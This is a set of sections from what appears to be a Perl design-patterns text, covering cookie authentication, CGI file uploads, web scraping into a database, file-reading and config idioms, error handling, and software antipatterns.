- .htaccess: Suited for a small number of users, each of which has the same permissions. User creation and maintenance involves modifying the file directly.

- Cookies: There are lots of formulas, but the winning one is: issue a cookie with an authorization token. Store the token in the database along with an expiration time separate of the cookie. The token should be randomly generated and completely separate from the password, but handed out when the password is validated. This is the best case; if your porn-addicted friend comes over and uses your computer, and steals your cookies.txt file when you aren't looking, cookies generated this way can't be used to discover the username or password used. The password change form could be used as a loophole though: if the token is still valid and the password change script doesn't explicitly double-check the old password before letting you change it, a new password could be put in place for the account without your friend knowing the old one. It is best to always check that the user knows the old password before allowing them to change it, to avoid this problem. Our example here doesn't do any of this. It merely hands out cookies that contain the literal username and password. Our passwords aren't stored encrypted in the database. See elsewhere for an example of that. The examples are at the bottom of this section.

- Munged links: Sometimes users don't have cookies turned on. In this case, you've got two options: tracking them by IP and including the session ID in all forms and links. Tracking users by IP is error prone, since an entire company's traffic is often filtered through a firewall that uses network address translation to present all of the internal computers' traffic as coming from one IP address. Inexpensive home "modem sharing" devices do exactly the same thing.
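Before moving on to munged links, here is a hedged sketch of the token scheme from the Cookies bullet above. The sessions table, column names, and helper are all invented for illustration; CGI's cookie()/header() and DBI's do() are real:

use strict;
use warnings;
use CGI qw(cookie header);
use Digest::MD5 qw(md5_hex);

# After the password checks out, hand back a random token that reveals
# nothing about the username or password.
sub issue_token {
    my ($dbh, $username) = @_;
    my $token = md5_hex(rand() . time() . $$);   # random, not derived from the password
    $dbh->do(
        'insert into sessions (username, token, expires) values (?, ?, ?)',
        undef, $username, $token, time() + 60 * 60,
    );
    return cookie(-name => 'session', -value => $token);
}

# print header(-cookie => issue_token($dbh, $username));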
Munging links requires that the session ID be constantly passed back to the scripts at every link or form. One dirty little trick that a programmer friend of mine (okay, it was me) used once (okay, several times) on mod_perl sites was having the handler parse .html files with embedded Perl, and munge all of the links - from both the .html and the Perl output. You prolly want to plan from the beginning to have a bunch of small .cgi scripts instead of one huge monolithic one... so you'll want to make a sort of "validateuser.pm" file and "use validateuser.pm;" at the top of each .cgi. That module creates recursive routines that communicate using global variables - ick. I need to change that, and then this example. Then I'll put that code up. XXX. Back to "PerlDesignPatterns" in PerlDesignPatterns. $Id: WebAuthentication,v 1.9 2003/02/23 19:07:42 httpd Exp $

Common application feature, for CGI applications. Users select files, using a form element in their web browser, and when they submit, that file is uploaded to the server with the rest of the form data.

<gogamoga> well, i`ll ask: how do i fetch attached file from the query?
<scrottie> ask to ask?
<Perl-fu> Don't ask to ask. Don't ask if anybody can help you with x. Just ask! Omit any irrelevant details. If nobody answers then we don't know or are busy for a few minutes. Wait and don't bug us. If you must ask again wait until new people have joined the channel.
<scrottie> my $fh = CGI::upload($fn); my $buffer; while (read($fh,$buffer,length($buffer)) { };
<scrottie> where $fn is the name of the CGI param. make sure the form has the right enctype.
<scrottie> i don't remember the enctype, but "perldoc CGI" will tell you
<scrottie> unless the form uses that special enctype, file uploads won't be uploaded, rather mysteriously
<gogamoga> THANK YOU SOOOOOOOOO MUCH
<gogamoga> i got lost in cgi.pm reference :(
<scrottie> heh, you're welcome. let me know if you get stuck.
<scrottie> yeah, someone really needs to slim that down.
<gogamoga> i use only jpg enctype so i wont even check it
<gogamoga> just fetch the file and save it
<scrottie> you don't understand.
<scrottie> hang on. let me find it.
<gogamoga> ok
<scrottie> if your form doesn't say <form method="post" enctype="multipart/form-data">, then <input type="file"> tags wont work. they won't upload the file.
<scrottie> reguardless of the type of the file, the file won't be uploaded.
<scrottie> Netscape 2 introduced the ability to upload files, and in order to support this feature, they had to introduce a new format for sending data to the server - the old application/x-www-form-urlencoded one couldn't handle large blocks of arbitrary data
<gogamoga> ah
<gogamoga> damn, it wont upload it but it still takes ages as it uploads it :)
<gogamoga> ah, sorry i am dumb
<scrottie> no, we all have to work through the standard mistakes ;)
<gogamoga> dreamweaver adds multipart/form-data by default
<gogamoga> :)
<scrottie> good. no one uses Netscape 1 anymore ;)

Elsewhere in this text there is an example of serving binary objects as images from a CGI script. This can easily be coupled with database BLOBs to store images in the database, and serve them as normal images from a CGI script. See Also

"WebScraping" is extracting information from the Web. Picking out information from web pages and using it in an application is said to be scraping the data. Usually refers to harvesting live data feeds or manipulating specific applications via the Web.
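Fetching the page is the first half of scraping. A minimal LWP sketch follows; the URL and the hand-off to a parser are placeholders:

use strict;
use warnings;
use LWP::UserAgent;

my $ua = LWP::UserAgent->new(timeout => 30);
my $response = $ua->get('http://www.example.com/quotes.html');   # placeholder URL
die 'fetch failed: ' . $response->status_line unless $response->is_success;

my $document = $response->content;   # HTML, ready for the parser below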
It goes by other names as well, especially when one type of information is sought across the entire web. LWP, as sketched above, fetches web pages given URLs. See the example HTML parser in "RunAndReturnSuccessor" in RunAndReturnSuccessor.

use TransientBaby::Forms;
use TransientBaby;

my $accessor;
my %opts;
my @table;
my $tablerow;
my $tablecol = -1;

parse_html($document, sub {
    $accessor = shift;
    %opts = @_;
    if($opts{tag} eq 'tr') {
        # create a new, blank array entry on the end of @table
        $tablerow++;
        $table[$tablerow] = [];
        $tablecol = 0;
    } elsif($opts{tag} eq 'td') {
        # store the text following the <td> tag in $table[][]
        $table[$tablerow][$tablecol] = $accessor->('trailing');
        $tablecol++;
    }
});

I've gone out of my way to avoid the nasty push @{$table[-1]} construct as I don't feel like looking at it right now. $tablerow and $tablecol could be avoided otherwise. This code watches for HTML table tags and uses those to build a two-dimensional array.

Data taken from a database and presented in HTML tables was normalized in the database, but is denormalized for display. When it is denormalized, data from several relational tables is presented as one table. In this case, there may be different views of the data, each driven by a different query or different query parameters. See "ObjectsAndRelationalDatabaseSystems" in ObjectsAndRelationalDatabaseSystems for more on normalization. If we're putting the harvested data back into a database to report on, it suits us to reconstruct some structure to it.

select table1.a, table2.b, table3.c
from table1, table2, table3
where table1.id = table2.id
  and table2.param = table3.id
order by table1.a, table2.b, table3.c

We can't recover the id or param fields from the output of this query, but we can generate our own. Joining between three tables flattens the extracted data down to one. This sort of joining has a tell-tale pattern in its output, in that the columns appear to count. The first n columns are from tablea, the second so many from tableb, and so on.

aaa aab aac aad aba aca ada baa bab (And so on...)

Add this clause to the if statement in the sub passed to parse_html() above, remembering to declare the introduced variables in the correct scope:

} elsif($opts{tag} eq '/tr') {
    if(!$tablerow or $table[$tablerow][0] ne $table[$tablerow-1][0]) {
        $dbh->execute("insert into tablea (a) values (?)", $table[$tablerow][0]);
        $table_a_id = $dbh->insert_id();
        # else $table_a_id will retain its value from the last pass
    }
    if(!$tablerow or $table[$tablerow][1] ne $table[$tablerow-1][1]) {
        $dbh->execute("insert into tableb (b, id) values (?, ?)", $table[$tablerow][1], $table_a_id);
        $table_b_id = $dbh->insert_id();
        # else $table_b_id will retain its value from the last pass
    }
    if(!$tablerow or $table[$tablerow][2] ne $table[$tablerow-1][2]) {
        $dbh->execute("insert into tablec (c, id) values (?, ?)", $table[$tablerow][2], $table_b_id);
        $table_c_id = $dbh->insert_id();
        # else $table_c_id will retain its value from the last pass
    }
}

This code depends on $dbh being a properly initialized database connection. I'm using ->insert_id(), a MySQL-style extension, for clarity. Unlike the previous code, this code is data-source specific. Only a human looking at the data can determine how best to break the single table up into normalized, relational tables. We're assuming three tables, each having one column, aside from the id field. Assuming this counting pattern, we insert records into tablec most often, linking them to the most recently inserted tableb record.
tableb is inserted into less frequently, and when it is, the record refers to the most recently inserted record in tablea. When a record is inserted into tablea, it isn't linked to any other records. XXX Todo: See Also

Problem: Perl gives so many ways to read a file, so many of them bad. Solution: Know the bad ones.

An Old Idiom in Poor Style

{
    local $/ = undef;
    open FH, "<$file";
    $data = <FH>;
    close FH;
}

Pros: Everyone seems to know this one. Reads in the entire file in one gulp without an array intermediary. Cons: $data cannot be declared with my because we have to create a block to localize the record separator in. Ugly.

A Short and Sweet Idiom

@ARGV = ($file);
my $data = join '', <>;

Pros: Short. Sweet. Cons: Clobbers @ARGV, poor error handling, inefficient for large files.

Shell-Holdout Idiom

my $data = `cat $file`;

Pros: Very short. Makes sense to sh programmers. Cons: Security problem - shell commands may be buried in filenames. Creates an additional process - poor performance for files small and large. No error handling. Is not portable.

Read/Sysread Idiom

open my $fh, '<', $file or die $!;
read $fh, my $data, -s $fh or die $!;
close $fh;

Pros: Good error handling. Reasonably short. Efficient. Doesn't misuse Perl-isms to save space. Uses lexical scoping for everything. Cons: None.

Mmap Idiom

use Sys::Mmap;
new Mmap my $data, -s $file, $file or die $!;

Pros: Very fast random access for large files, as sectors of the file aren't read into memory until actually referenced. Changes to the variable propagate back to the file, making it read/write, well, cool. Cons: Requires use of an external module such as Sys::Mmap, the file cannot easily be grown, and it is difficult for non-Unix-C programmers to understand.

Problem: Reading configuration data from a file that users can edit and have written back to disc. Using require to read config files is handy, but many people feel they've outgrown using it, so they write elaborate modules to handle configuration. Solution: Hot-rod require with advanced features to the degree it makes sense before resorting to complex or do-it-yourself replacements. Configuration is one of those sore spots where the limits of require are continuously pushed by users. Most Perl programmers give up their old config.pl when requirements specify a spiffy Web or Tk interface for users to change settings. No more!

# config.pl:
$config = { widgets=>'max', gronkulator=>'on', magic=>'more' };

# configTest.pl:
use Data::Dumper;
require 'config.pl';
$config->{gronkulator} = 'no, thanks';
open my $conf, '>', 'config.pl' or die $!;
print $conf Data::Dumper->Dump([$config], ['config']);
close $conf;

Data::Dumper comes with Perl, and can even store entire objects. In fact, it can store networks of objects. Security may be a concern: if you don't want Perl in configuration files to gain the privileges of your program - because the program runs as the superuser, or is setuid and the people running it don't have access to edit it, or simply on principle - use the Safe module.

Finding the Config or Data Directory: Something that is reasonably portable between Unix and Windows is to look for an environment variable telling you where to go for the data. msconfig.exe lets you set startup environment variables, and a lot of Unix programs (cvs, postgres, etc.) use environment variables to find their data if it isn't passed on the command line. Polluting the environment in Unix is considered bad form by many, and dropping something in /etc isn't portable, so go fish.
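A minimal sketch of that environment-variable lookup, with a fallback to a dot-directory; the MYAPP_HOME name and .myapp directory are invented for illustration:

use strict;
use warnings;
use File::Spec;

# Honor MYAPP_HOME if the user set it, else fall back to a
# dot-directory under their home directory.
my $config_dir = $ENV{MYAPP_HOME}
    || File::Spec->catdir($ENV{HOME} || $ENV{USERPROFILE} || '.', '.myapp');

my $config_file = File::Spec->catfile($config_dir, 'config.pl');
require $config_file if -e $config_file;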
Active Config: Closures are useful for doing config options that have behavior:

$dumping = "xterm -display $display";

You could (if you wanted) make that a closure. That would let you use the multiple-arg version of system(), which is good security practice, and the closure would bind to my variables, so if the config changes at run time, they change there too.

$dumping = sub { system 'xterm', $arg, $arg; };

XXX - dumping active config using B::Deparse See Also

Die Early, Die Often: Catch errors before you get far away, or unrelated code will appear to malfunction, as a horrible form of "ActionAtADistance" in ActionAtADistance. In the process of debugging, you're going to need to insert lots of tests anyway, so why not do it neatly from the beginning and integrate it into your program? When the program is in production is when error reporting is most needed, if users or logs are going to communicate the nature of the problem to you to be fixed. See "RunAndReturnSuccessor" in RunAndReturnSuccessor for a description of checkpointing an application to recover from otherwise fatal errors. eval { } is used for trapping errors - see "AssertPattern" in AssertPattern.

open my $f, 'file.txt' or die $!;

or die should literally dot your code. That's how you communicate to Perl and your readership that it is not okay for the statement to silently fail. Most languages make such error generation the default; in Perl, you must request it. This is no excuse for allowing all errors to sneak by silently. Should you not have the constitution to speckle your code with or die clauses, or you're a minimalist, striving for elegance, there is a solution:

# from the Fatal.pm perldoc:
use Fatal qw(open close);
sub juggle { . . . }
import Fatal 'juggle';

Fatal.pm will place wrappers around your methods or Perl built-in functions, changing their default behavior to throw an error. A module which does heavy file IO on a group of files need not check the return value of each and every open(), read(), write(), and close(). Only at key points - on method entry, entry into worker functions, etc. - do you need to handle error conditions. This is a more reasonable request, one easily achieved. Should an error occur and be caught, the text of the error message will be in $@.

use Fatal qw(open close read write flock seek);   # print cannot be made fatal

sub update_data_file {
    my $this = shift;
    my $data = shift;
    local *filename = \$this->{filename};
    local *record   = \$this->{record};
    eval {
        open my $f, '+<', $filename;
        flock $f, 2;                  # LOCK_EX
        seek $f, $record, 0;
        print $f $data;
        close $f;
    };
    return 0 if $@;   # update failed
    return 1;         # success
}

Alternatively, rather than using eval { } ourselves, following "AssertPattern" in AssertPattern, we could trust that someone at some point installed a __DIE__ handler. The most recently installed local handler gets to try to detangle the web.

sub generate_report {
    local $SIG{__DIE__} = sub {
        print "Whoops, report generation failed. Tell your boss it was my fault. Reason: ", @_;
    };
    foreach my $i ($this->get_all_data()) {
        $data->update_data_file($i);
    }
}

sub checkpoint_app {
    local $SIG{__DIE__} = sub {
        print "Whoops, checkpoint failed. Correct problem and save your data. Reason: ", @_;
    };
    $data->update_data_file($this->get_data());
}

Using locally scoped handlers this way allows you to provide context-sensitive recovery, or at least diagnostics, when errors are thrown. This is easy to do and all that is required to take full advantage of Fatal.pm.
Fatal.pm was written by [email protected] with prototype updates by Ilya Zakharevich [email protected].

Time-Outs: Use alarm() with eval():

RETRY:
eval {
    local $SIG{ALRM} = sub { die "alarm\n" };   # so eval can catch the timeout
    alarm 30;    # send a SIGALRM after 30 seconds
    # do something that might time out
    alarm 0;     # disable alarm
};
if($@) {
    # there was an error - error text is in $@ - do what you will - perhaps retry:
    goto RETRY;
}

select() provides an alternative for timeouts on I/O, and is especially safe when coupled with non-blocking I/O. See "SelectPollPattern" in SelectPollPattern.

Throwing Objects: die() will also accept a reference to an object rather than a string, letting you throw structured exceptions. See Also

Use die(): Avoid the temptation to write a new death-handler and call it by name in place of die():

# don't do this
sub barf {
    print "something went wrong!\n", @_;
    exit 1;
}
# ...
barf("number too large") if($number > $too_large);

die() has a useful default behavior that depends on no external modules, but can easily be overridden with a handler to do more complex cleanup, reporting, and so on. If you don't use die(), you can't easily localize which handler is used in a given scope.

Every Error, Great And Small: warn() provides a reasonable default for reporting potential errors. Programs run at the command line get warn() messages sent to stderr. CGI programs get warn() messages sent to the error log, under Apache and thttpd [37]. Using CGI::Carp, warnings are queued up for display in the event of a die(), thus making important debugging information available. Even reasonable defaults aren't always what you want. Without changing your code [38], the behavior of warn() and die() can be changed:

# send diagnostic output to the end of a log
open my $debug, '>>', 'bouncemail.debug' or die $!;
$SIG{__WARN__} = sub { print $debug join(" - ", @_); };
$SIG{__DIE__}  = sub { print $debug join(" - ", @_); exit 0; };

Some logic will want to handle its own errors - sometimes a fatal condition in one part of code doesn't really matter a hill of beans on the grand scale of the application. A command-line print utility may want to die if the printer is off line [39] - a word processor probably does __not__ want to exit with unsaved changes merely because the document couldn't be printed. So, do this:

local $SIG{__DIE__} = sub {
    # yeah, whatever
};
# or...
local $SIG{__DIE__} = 'IGNORE';

...or, do the error processing of your choice. Perhaps set a lexically bound variable flag.

Report Everything: In the event of a fatal error, display as much information as possible about the current execution context.

# intercept death long enough to scream bloody murder
$version = '$Id: ErrorReporting,v 1.20 2003/05/15 09:58:41 $';

A software error has occurred. Give the user an out. I wish I could remember what book this was from - the St. Thomas University library in St. Paul, Minnesota had it, but the author quoted a conversation that went something like... I noticed a contingency in the code, so I went to the client and asked him how I should handle it. He said, "Oh, that won't happen, it doesn't matter". Dumbfounded, knowing full well that it might happen, I said, "Oh, so if the program reaches this point, it is okay to drop the database, delete all of the data, lock up, and stop responding without printing any diagnostic message?" The client reeled back aghast and exclaimed, "No! You can't do that!". I said, "Unless we put some code in here to handle this situation, that's exactly what might happen! Now, when the code reaches this point, how should we handle it?"
Popping up a form that asks for contact information rather than a credit card, and transmits it insecurely along with the contents of the cart, is our solution. Perhaps their order wasn't complete - that's okay. At least the system knew it failed and did something reasonable. See Also

Problem: Supporting features, such as protocols, that don't yet exist. Solving general problems without concern for the specifics of details. Solution: Provide a framework for a certain kind of task.

Frameworks: A "framework" uses other modules. Normal modules have a fixed set of dependencies and are only extended through subclassing, as per "AboutInheritance" in AboutInheritance. A framework may consist of several parts that must be inherited to be used, much like several cases of "AbstractClass" in AbstractClass. It may also be passed references to other objects, as would a class that sets up such an arrangement. It may read names of classes from a "ConfigFile" in ConfigFile or from the user. Instead of code being used by other code, it will use other code on the fly. It is on top of the food chain instead of the bottom. XXX examples of these cases as "extensibility".

Configuration Files as Extensions: A "ConfigFile" in ConfigFile may be enough to customize the module for reasonable needs. It may also specify modules by name to be created and employed in a framework.

# the config.pl file defines @listeners to contain a list of class names
# that should receive notices from an EventListener broadcaster,
# referenced by $broadcaster.
require 'config.pl';
foreach my $listener (@listeners) {
    eval "require $listener" or die $@;   # string eval, so require() loads a class by name
    my $list_inst = $listener->new();
    $broadcaster->add_listener($list_inst);
}

See elsewhere for the broadcaster/listener idiom. This avoids building the names of listener modules into the application. An independent author could write a plug-in to this application: she would need only have the user modify config.pl to include mention of the plug-in. Of course, modification of config.pl could be automated. The install program for the plug-in would need to ask the user where the config.pl is, and use the "ConfigFile" in ConfigFile idiom to update it.

Extending Through Scripting: A major complaint against GUIs is that they make it difficult to script repetitive tasks. Command line interfaces are difficult for most humans to work with. Neither gives rich access to the API of a program. A well designed program is a few lines of Perl in the main program that use a number of modules. This makes it easier to reuse the program logic in other programs. Complex programs that build upon existing parts benefit from this, without question. How about the other case - a small script meant to automate some task? This requires that the script have knowledge about the structure of the application - it must know how to assemble the modules, initialize them, and so on. It is forced to work with aspects of the API that it almost certainly isn't concerned with. It must itself be the framework. This is a kind of "AbstractionInversion" in AbstractionInversion - where something abstract is grafted onto something concrete, or something simple is grafted onto the top of something complex. It would make more sense in this case for the application to implement a sort of "VisitorPattern" in VisitorPattern, and allow itself to be passed whole, already assembled, to another spat of code that knows how to perform specific operations on it.
This lends itself to the sequential nature of the script: the user-defined extension could be a series of simple calls, with a "FacadePattern" in FacadePattern providing an interface to the application - the user's code is passed to the run_macro() method of an instance of that package. Many applications will have users that want to do simple automation without being bothered to learn even a little Perl (horrible but true!). Some applications (like Mathematica, for instance) will provide functionality that doesn't cleanly map to Perl. In this case, you'd want to be able to parse expressions and manipulate them. In these cases, a little language may be just the thing. XXX - move this.

A little language is a small programming language created specifically for the task at hand. It can be similar to other languages. Having something clean and simple specifically targeted at the problem can be a better solution than throwing an overpowered language at it. Just by neglecting unneeded features, user confusion is reduced.

Out of context, the string "xyzzy" could be either a parameter or the name of a method to call. The solution is simply to keep track of context: that is where $state comes in. Every time we find something, we update $state to indicate what class of thing would be valid if it came next. After we find a function name and an opening parenthesis, either a hash-style parameter or a single, lone parameter, or else a close parenthesis would be valid. We aren't even looking for the start of another function [40]. After a parameter, we're looking for either the close parenthesis or another parameter. Every time we match something, we append a Perl-ized version of exactly the same thing onto $perl. All of this is wrapped in a package and method declaration. Finally, $perl is evaluated. The result of evaluating should be to make this new package available to our code, ready to be called. XXX a B::Generate example!

Beans as Extensions: XXX a B::Generate example!

Hacks as Extensions: When a base application, or shared code base, is customized in different directions for different clients. Make heavy use of overriding, localizing client-specific code into a module or tree of modules under a client-specific namespace rather than "where it belongs". See Also

When programming, you take a generic algorithm and customize it for a task. Sometimes you have a copy of an implementation of that algorithm laying around that you can copy. OO tells us not to do that. Someone once said, "If you're going to make a mistake, make it in a big way". Keeping one sacred copy that must be correct could certainly accomplish that. However, it makes it possible to fix a problem once instead of having it spread around the code. Having code replicated is a huge commitment. You're banking that nothing is wrong with it, that your program will never change how the data it works on is represented, and that people like looking at endless permutations of a single piece of code. Object Orientation proposes to eliminate this. The act of separating your program into objects creates a ripe new area for endless duplication: sequences of setting, querying, and passing data. Snafus like this cause the number of accessors to grow to accommodate all of the permutations of accessing the data. You'll often see a set_ function, a query_ or get_ function, and an add_ function, for each value we encapsulate. Where should logic that uses this data live?

1. Applies only to this particular client: Leave the server's accessors in the client, in this case, Casino.

2.
Nearly every client can benefit from this code: Put the logic in the server, in this case, $player.

3. Applies to a special case of clients: Consider a Facade for $player. Not worth it? Toss up between #1 and #2.

4. Applies to a special case of servers: Subclass $player's package.

It's okay to do it "wrong". Each new thing that gets built will give you more and more insight into how things really need to be able to work. The important thing is to continue to incorporate these lessons into the code, to keep the code in line with reality, and never be afraid of breaking your code. If you're afraid of breaking your code in the name of making it better, it has you hostage. If you're afraid of breaking it because you think it'll take too long to fix it to work again after the change, it has already grown rigid, and only frequently breaking and fixing it will allow it to regain its flexibility. Take Jackie Chan, for instance. Having broken countless bones, he's only gotten stronger, braver, and apparently, more skilled at walking on a broken leg, more knowledgeable about his limits, and adept at healing.

Alternatively, if you're afraid of subtle bugs creeping in undetected, you've got murky depths syndrome. Perhaps a lot of it is poorly understood Lava Flow code, that was laid down once, built on top of, and has become permanent for it. Reading through the dark murky code is a good start. A pass now and then keeps the possibilities and implications fresh in your mind. However, this is time consuming and will ultimately miss implications. There is no substitute for knowledge of the code, and neither is there substitute for testing. There is a special class of code where every bit of logic is exercised on every execution. Mathematical modeling applications that work on large, well understood datasets fit this description. Any subtle bug would give dramatic bias in the output as soon as the buggy program were run. Normal programs don't have this luxury - their bugs lurk for ages, possibly until maintenance headaches dictate they be abandoned and rewritten. We can't understand everything in a large program, but we can contrive data sets and test applications that work out every feature of our module. Writing artificial applications that use our modules, and coming up with bizarrely improbable-in-every-way datasets, simulates the "luxury" case where all of the dark murky depths are used every run - in our case, every test run. The only time dark murky depths and Lava Flow code, the code most in need of a refactor, can be attacked is when we have a definitive method for discovering whether or not we've broken it.

"Measure twice, cut once". If you're anything like me, you like flying by the seat of your pants. If you go to the movies or watch the tele, you know that every fighter pilot struggles with this issue: do I trust my intuition and wing it, or do I go by the book? Luke Skywalker destroyed the Death Star without that damn useless targeting computer. The architects that built skyscrapers certainly had to think outside of the box, so to speak, to come up with techniques and ideas for building beyond the bounds of what was believed possible, but no one would trust an architect that couldn't back up his gut instincts with cold, hard math. Solution? Code with your heart, but be the first to know when you make the inevitable wrong guess. Write seat-of-your-pants code, but write first class scientific tests, as sketched below. Cut and paste code is a sign of larger problems.
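A hedged sketch of what such a test might look like with Test::More, using the earlier Xfor flat-file module as an example target (the file name and values are invented, and Xfor's exact interface is assumed from the usage shown earlier):

use strict;
use warnings;
use Test::More tests => 3;

use_ok('Xfor');   # the flat-file journaling module from earlier

my $hash = Xfor->new();
ok($hash->set('parts.nvp', 'xj-11', 'muffler', 'c3p0'), 'set stores a value');
is($hash->get('parts.nvp', 'xj-11', 'muffler'), 'c3p0', 'get returns what set stored');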
Premature optimization is the root of all evil. Don't optimize for bugs. Don't optimize for poor implementations of language interpreters. Don't optimize a naive implementation. All of these things will change right out from under you. Code that is dependent on something broken for speed will run slower when the real problem is fixed. Optimization isn't evil - only premature optimization is. In each of these examples, if the more general case is optimized rather than specific cases, everything is right in the world. People failing to see the bigger picture are the ones causing grief. If you think you see the bigger picture, you almost certainly don't. Like a good security consultant, a good programmer is pessimistic about everything. I won't bore you with statistics about computers becoming faster faster than you can change your code. The fact is, there is a niche for squeezing the last drop of performance out of an application. This niche shows people what they could do if only their computer were a little faster, and it drives hardware performance. The conclusion to draw from this is: if there is a quicker way to do something in Perl that is less readable or requires jumping through hoops, it is a bug in the more readable implementation, and the more readable implementation will soon be fixed. Write good Perl. Let Perl do its thing. There are some optimizations which are considered good style, and therefore aren't premature. See Also

"If I use the Object Oriented features, I must be benefiting from them". OO is no silver bullet. It isn't a cure-all and it isn't impossible to do more harm than good with it. It's a good indication that something has gone wrong if it is adding complexity rather than removing it. Remember, keep it simple. When it becomes clear how to refactor your code, do so then, not before. Can interchangeable objects be used interchangeably? Can one object be replaced with several objects? If not, consider adding a common Interface Type to the like objects, and creating an Abstract Factory to create and return the correct one for any given situation. Think of saving files using one of many filters. Are objects being used purely to hold values? You've probably got one or two big fat Big Ball Of Mud objects. Start moving logic out into the package that contains the data it most closely identifies with. Insert shims that delegate the method call to the object to keep everything running, if you must, and experiment with removing the shim over time. If nothing else, this sets a precedent, and new code can be written immediately in the new, correct way, rather than more and more code accumulating using the old, ugly approach. Can you remove an object from the system without breaking every other object? If not, they are too interdependent, with very few exceptions. Even with the Microsoft Windows operating system, something like "the registry" sounded like a great idea at first. Any program, as well as the operating system, could store configuration and run time data in a central database. In practice, it creates a single point of failure, frequently sustaining damage that causes the entire system to need to be restored from backup or reinstalled. The file grows too large and the operating system fails on any attempt to grow it beyond the limit of the max file size. Windows was designed with the registry being a core, unchanging idea, but in retrospect, it may have been better if it weren't an absolute.
Examining your code for objects which absolutely cannot be removed provides great insight into overdependence. If every object is dependent on every other object, object orientation is doing nothing for you. If any object can be removed with minimal damage to the overall structure, you have something healthy and organic. See Also

Procedural code converted to OO lends itself to one main object with lots of little objects hung off of it. The interdependency in the code doesn't change, and objects don't become noticeably autonomous. Like things may be grouped together, but for the wrong reasons: historically they have been used in sequence, or they form an implementation and interface wrapped together.

Also known as a Stove Pipe System, as apparently stove pipes were prone to corrosion and needed frequent repair with whatever was at hand, creating a discombobulated kludge. "An ill-assorted collection of poorly matching parts, forming a distressing whole." - Jackson Granholme

The problem with retrofits is they are typically hastily done and never improved before the next story is built. They come under an immediate pressing concern that overwhelms any reasonable ability to think of the future. Indeed, the future won't exist at all for the project if the retrofit isn't done. Not even in Las Vegas are floors built so aggressively. Regardless of whether you're in the Windows camp or the Unix camp, you're using an operating system built for a 16 bit system that has been retrofit, but never actually completely rewritten. Other operating systems have equally interesting stories - MacOS 1 through 9 was written for a 32 bit native address space, but memory protection was retrofit, while Unix was written for a 16 bit address space and retrofit for 32, but incorporated memory management from the beginning. AmigaOS was originally Tripos, but was written in BCPL, a language that had one data unit - the machine word - making the conversion to a 32 bit processor and system bizarrely easy, while making mundane programming tasks bizarrely painful. C later grew out of BCPL, where it cleaned up the syntax, introduced subscripts on arrays of different sized units of memory, then later structs, unions, and countless other modern marvels - but all of this is neither here nor there.

Refactor mercilessly - systems can effectively be adapted, and in order to build very far at all, you almost have to adapt an existing system. Adaptation cannot be sustained without time spent making fundamental changes, but fundamentally it is a better investment to maintain and adapt existing systems rather than rewrite them. Most spectacular software industry failures arose from failure to maintain systems followed by an attempt to rewrite them from scratch. Most successes can trace their code back to the 1970s: the SAS system, Unix, DB2, and Signaling System 7, for example. It has been said that it takes 10 years to write a program. I'd place that as a minimum. Most software starting life in the 1970s is now rock solid, mature, and portable. Most programs that started life in the mid-1980s are still having growing pains, stability problems, and their owners can't bear the expense of porting them.

Perl allows you to quickly create applications. Perl itself could be considered a "BigBallOfMud" in BigBallOfMud, with complexity oozing out every pore. Perl has been around longer than 10 years. A large part of the code reuse of a script is from the interpreter itself. Writing an interpreter is one way of writing an API for code reuse.
This gives significant lead time on small scripts, but growing and changing applications hit a ceiling even quicker because of this accelerated start. Perl scripts quickly reach the point where they need to be detangled. "GodObject" in GodObject has specific steps for migrating code and data out of a monolithic object. <s>This exhibits "LayeringPattern" in LayeringPattern, Polymorphism, "LooseCoupling" in LooseCoupling, "CommandObject" in CommandObject, Routing, and other patterns.</s> See "PerlDesignPatterns" in PerlDesignPatterns for the table of contents.

No one understands it, so no one refactors it. Just as it is almost impossible to untangle a plate of spaghetti, code with no visible structure and no logical structure is daunting. Structured Programming contributed to the world the idea that code should visibly reflect its logical structure: this was the birth of indenting. Previously, a goto would bounce back a few lines in flow, and another one somewhere in the middle would bounce you past the last goto.

1. Side effects: Each method called seems to do countless unrelated unexpected things, making the normal flow difficult to understand or discover. When writing new code, it is often impossible to reuse existing code because of the unfathomed grouping of unrelated tasks.

2. Dark heart: The heart of each routine, object, module, etc. is buried somewhere deep in its bowels, poorly or not marked, and reached through an obscure path, kind of like an Egyptian pyramid.

3. Ransom transaction: Data is communicated through global variables, or stashing data in some remote object. This is akin to conducting a ransom transaction by demanding that money be thrown into a dumpster in an abandoned industrial complex to be picked up by someone who will presumably flee and kill the kidnappee should either cops be there or money not be. This is an entirely unwholesome way to conduct a transaction.

4. Three cups and a nut: Large amounts of unrelated things are grouped together without regard for when, how, by whom, in what order, under what conditions, or why they are used. Since they all look alike and any may be used at any time, getting lost is easy. Which one actually gets used may well be a sleight of hand anyway.

5. Wheel factory: Reinventing the wheel, or stack, or program control constructs, or parameter passing mechanisms, or anything else which should be both standardized throughout a language and completely factored out of the language. This clutters the program with difficult to understand, repeated idiom.

If Spaghetti code is needed, it can take on a life of its own. Most large projects have some legacy code that forms the heart of their project that is no longer represented by a human who wrote it. See also: "LavaFlow" in LavaFlow, "GodObject" in GodObject, "ObjectOrgy" in ObjectOrgy

That's a thought: some common goto idioms, documented in the interest of untangling them. The Linux kernel uses a goto-on-failure idiom where error return codes are set just in case, but that is the actual result code only when an error causes a goto to exit the function. Other programs simulate stacks using temporary variables that they stash things in - older code sure suffered from that. When code just kind of spews forth and becomes permanent, it becomes an architectural feature of the archeological variety. Things are built atop the structure without question and without hope of changing what is beneath them. The existing code is seen as a historical curiosity.
XXX There is a tale of a computer manufacturer, back in the days when each vendor had their own CPU. There was a bug in their new processor, and production schedules didn't give them time to work it out. The department responsible for coding the system software (operating system) for the thing was instructed to work around it. The system software dutifully avoided tickling the bug, and documented its presence for anyone writing applications for the machine. Software was ported to the machine, and authors unsure what to make of the bug warned end users that certain features of the applications didn't function correctly on this machine.

Hardware or software that serves no useful purpose that is kept around for political reasons. Often, everyone is secretly waiting for it to be used again, so it is no longer a derelict eyesore. Not sure this antipattern really fits with the motif of this text.

Problem: Using 100% of the CPU to wait for an event.

while(1) {
    if(@queue) {
        dosomething();
    }
}

This example applies to threaded code, but non-threaded code can fall prey as well:

while(! -f $file) { }
# do something with $file here

Both busy-wait, burning CPU to accomplish nothing. Using sleep() and yield() from the threads package is an improvement. Sometimes polling is unavoidable. When you wrote the code you're waiting on, using a semaphore from Thread::Semaphore lets you easily and efficiently communicate readiness between threads. Unix programs have no way of being notified when a file shows up, so polling may be the only solution: just sleep() so others can get work done.

Non-Blocking I/O: IO::Socket::INET has a ->blocking(0) method to disable blocking. Blocking halts the program until data is available to read. In a program running as a daemon or server that needs to service I/O on multiple channels, this is unacceptable - blocking must be disabled. Code like this will be written:

